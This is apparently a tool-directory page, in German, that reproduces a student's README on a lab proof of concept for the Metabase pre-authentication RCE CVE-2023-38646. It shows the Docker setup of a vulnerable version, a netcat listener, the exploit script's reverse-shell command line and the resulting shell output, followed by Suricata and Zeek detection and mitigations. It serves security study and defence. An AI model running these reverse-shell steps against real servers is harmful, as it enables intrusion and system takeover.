Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Metabase-Pre-Auth-RCE-POC — CVE-2023-38646 | Kitploit
Tools/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Defensive ToolsVulnerability AnalysisExploitationWeb SecurityPenetration TestingIntrusion DetectionLearning & EducationIncident ResponsePayload Development
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2023-38646 — Metabase Remote Code Execution (RCE) Proof-of-Concept

Übersicht

Dieses Repository dokumentiert ein Proof-of-Concept (PoC) Sicherheitsforschungsprojekt, das CVE-2023-38646 analysiert, eine kritische Pre-Authentifizierungs-Remote Code Execution (RCE)-Schwachstelle in verwundbaren Versionen von Metabase.

Ziel dieses Projekts ist es, den vollständigen Lebenszyklus einer realen Schwachstelle zu demonstrieren, einschließlich:

  • Verständnis der Schwachstelle und ihrer Ursache
  • Nachstellung des Exploits in einer kontrollierten Laborumgebung
  • Aufbau einer Reverse Shell auf dem verwundbaren System
  • Beobachtung des Angriffsverhaltens durch Netzwerküberwachungswerkzeuge
  • Demonstration von Detection Engineering-Techniken
  • Vorschlag von defensiven Abwehrstrategien

Dieses Repository soll praktische Fähigkeiten in folgenden Bereichen demonstrieren:

  • Schwachstellenforschung
  • Exploit-Nachstellung
  • Reverse Shell-Nutzung
  • Netzwerkverkehrsanalyse
  • Einbruchserkennungssysteme
  • Sicherheitsabwehrstrategien

Hintergrund der Schwachstelle

CVE-2023-38646 ist eine kritische Schwachstelle, die bestimmte Versionen von Metabase betrifft, einer Open-Source-Plattform für Business Intelligence und Analysen.

Die Schwachstelle ermöglicht es einem Angreifer, eine nicht authentifizierte Remotecodeausführung zu erreichen, indem er Schwachstellen im Setup- oder Konfigurationsprozess der Anwendung ausnutzt.

Wichtige Details:

  • CVE-ID: CVE-2023-38646
  • Schweregrad: Kritisch
  • CVSS-Score: 9.8
  • Angriffsvektor: Netzwerk
  • Erforderliche Authentifizierung: Nein
  • Auswirkung: Remote Code Execution (RCE)

Eine erfolgreiche Ausnutzung ermöglicht es einem Angreifer:

  • Beliebige Befehle auf dem Zielsystem auszuführen
  • Eine Reverse Shell aufzubauen
  • Möglicherweise eine vollständige Systemkompromittierung zu erreichen

Offizielle Referenzen:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

Verwendete Technologien und Werkzeuge

Dieses Projekt kombiniert sowohl offensive Sicherheitswerkzeuge als auch defensive Überwachungswerkzeuge.

Offensive Sicherheit

  • Python
  • Reverse-Shell-Payloads
  • Benutzerdefiniertes Exploit-Skript
  • Verwundbare Metabase-Instanz

Erkennung & Überwachung

  • Suricata — Intrusion Detection System (IDS)
  • Zeek — Network Security Monitoring (NSM)

Defensive Technologien

  • ModSecurity — Web Application Firewall
  • OSSEC — Host-basiertes Intrusion Detection System

Laborumgebung

Platzhalter — Beschreiben Sie Ihren Laboraufbau

Beispiel:

  • Angreifer-Maschine: Kali Linux
  • Ziel-Maschine: Verwundbarer Metabase-Server
  • Netzwerküberwachungs-Maschine: Sicherheitsüberwachungs-VM

Exploitation PoC

Angriffsketten-Diagramm

root@kitploit:~
flowchart LR
    A[Angreifer] --> B[Verwundbare Metabase-Instanz]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell aufgebaut]
    E --> F[Befehlsausführung auf dem Ziel]

Dieses Diagramm veranschaulicht den allgemeinen Angriffsablauf, der in diesem Projekt verwendet wird.

Proof-of-Concept (PoC) Einrichtung

Docker-Installation und -Einrichtung:

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Docker-Initiierung:

Eine verwundbare Metabase Enterprise-Instanz (v1.44.0) wurde mit Docker bereitgestellt.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

Dadurch wird die Metabase-Weboberfläche auf Port 3000 freigegeben, sodass auf die Setup-Seite zugegriffen werden kann.

Wenn Docker bereits läuft, führen Sie die folgenden Befehlszeilen aus, um neu zu starten:

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

'Docker Einrichtung' Platzhalter

Sobald der Container läuft, wird die Metabase-Oberfläche über den Browser zugänglich.

root@kitploit:~
    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

Die Setup-Seite bestätigt, dass die Metabase-Instanz aktiv und zur Konfiguration bereit ist.

Exploitation Scenario 1

BurpSuite

Demo / Dokumentation

Platzhalter für Screenshots oder Erklärung

Exploitation Scenario 2 - Python Script Exploit

  1. Reverse Shell Listener-Vorbereitung

Vor dem Starten des Exploits wird auf der Angreifer-Maschine ein Netcat-Listener gestartet, um die Reverse-Shell-Verbindung zu empfangen.

root@kitploit:~
    nc -lvnp 6666

Dieser Listener wartet auf eingehende Verbindungen vom exploierten Metabase-Server.

Platzhalter für Screenshots oder Erklärung

  1. Exploit-Ausführung Das Exploit-Skript wird von der Angreifer-Maschine ausgeführt.
root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit-Name
    --rhost http://192.168.1.136:3000 \         ---> Ziel-IP-Adresse
    --lhost 192.168.1.137 \                     ---> IP-Adresse des Angreifers
    --lport 6666                                ---> Listening-Port des Angreifers

Der Payload führt einen Befehl aus, der eine Reverse Shell zurück zur Angreifer-Maschine herstellt.

  1. Reverse Shell aufgebaut Nach erfolgreicher Ausführung des Payloads baut die verwundbare Metabase-Instanz eine Verbindung zurück zur Angreifer-Maschine auf.

Der Netcat-Listener empfängt die Verbindung und gewährt dem Angreifer Shell-Zugriff auf das System.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

Zur Bestätigung der Verbindung zum Zielgerät:

root@kitploit:~
    whoami

Ausgabe:

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

Detection Engineering PoC

Dieses Projekt demonstriert auch, wie Exploit-Aktivitäten mit Netzwerküberwachungswerkzeugen erkannt werden können.

Suricata Erkennung

Suricata (IDS) wurde verwendet, um den Netzwerkverkehr auf verdächtige Muster im Zusammenhang mit dem Exploit zu überwachen.

root@kitploit:~
sudo suricata -i eth0

Platzhalter: Suricata-Alarm-Screenshot einfügen

root@kitploit:~
evidence/detection/suricata_alert.png

Um Alarme in Echtzeit zu beobachten, wurden die Suricata-Logs mit folgendem Befehl überwacht:

root@kitploit:~
tail -f /var/log/suricata/fast.log

Platzhalter: Suricata-Log-Screenshot einfügen

root@kitploit:~
evidence/detection/suricata_log.png

Für einen passiven Ansatz wurde ein benutzerdefiniertes Benachrichtigungsskript verwendet, das Desktop-Alarme auslöst, sobald Suricata verdächtigen Verkehr erkennt.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

Bei der Ausführung des Exploits generierte Suricata Alarme, die auf verdächtige Aktivitäten im Zusammenhang mit dem Metabase-Exploit-Versuch hinweisen.

Platzhalter: Suricata-Log-Screenshot einfügen

root@kitploit:~
evidence/detection/suricata_noti.png

Beispiel:

Platzhalter: Suricata-Log-Screenshot einfügen

root@kitploit:~
evidence/detection/suricata_noti.png

Zeek Netzwerkanalyse

Zusätzlich zur IDS-Überwachung wurde Zeek verwendet, um den Netzwerkverkehr zu analysieren und anomales Verhalten zu identifizieren.

Zeek wird mit diesen Befehlen gestartet, um die Erfassung und Analyse des Netzwerkverkehrs zu beginnen:

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

Platzhalter: Zeek-Start-Screenshot einfügen

root@kitploit:~
evidence/detection/zeek.png

Durch die Überprüfung der Verbindungslogs kann der Reverse-Shell-Verkehr auf Port 6666 beobachtet werden.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

Platzhalter: Zeek-Log-Screenshot einfügen

root@kitploit:~
evidence/detection/zeek_log.png

Abwehr- und Verteidigungsstrategien

Mehrere Abwehrstrategien können das Risiko einer Ausnutzung verringern.

StrategieBeschreibung
Patch-ManagementUpgrade von Metabase auf eine Version, die CVE-2023-38646 patcht
Web Application Firewall (ModSecurity)Filtern bösartiger HTTP-Anfragen

Repository-Struktur

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

Zusammenfassung

Dieses Projekt demonstriert den vollständigen Lebenszyklus der Analyse und Nachstellung einer realen kritischen Schwachstelle.

Das PoC zeigt:

  • Schwachstellenanalyse
  • Exploit-Nachstellung
  • Reverse-Shell-Ausführung
  • Netzwerkverkehrsüberwachung
  • Einbruchserkennung
  • defensive Abwehrstrategien

Das Ziel dieses Repositorys ist es, eine technische Fallstudie bereitzustellen, die sowohl offensive als auch defensive Cybersicherheitspraktiken veranschaulicht.


🖋️ Autor

Styverson Ng

Bachelor of Information Technology
Künstliche Intelligenz & Autonome Systeme
Cybersicherheit & Cyberforensik

Murdoch University

Tool herunterladen
Host Intrusion Detection (OSSEC)Überwachen verdächtigen Systemverhaltens
Netzwerküberwachung (Suricata & Zeek)Erkennen abnormaler Verkehrsmuster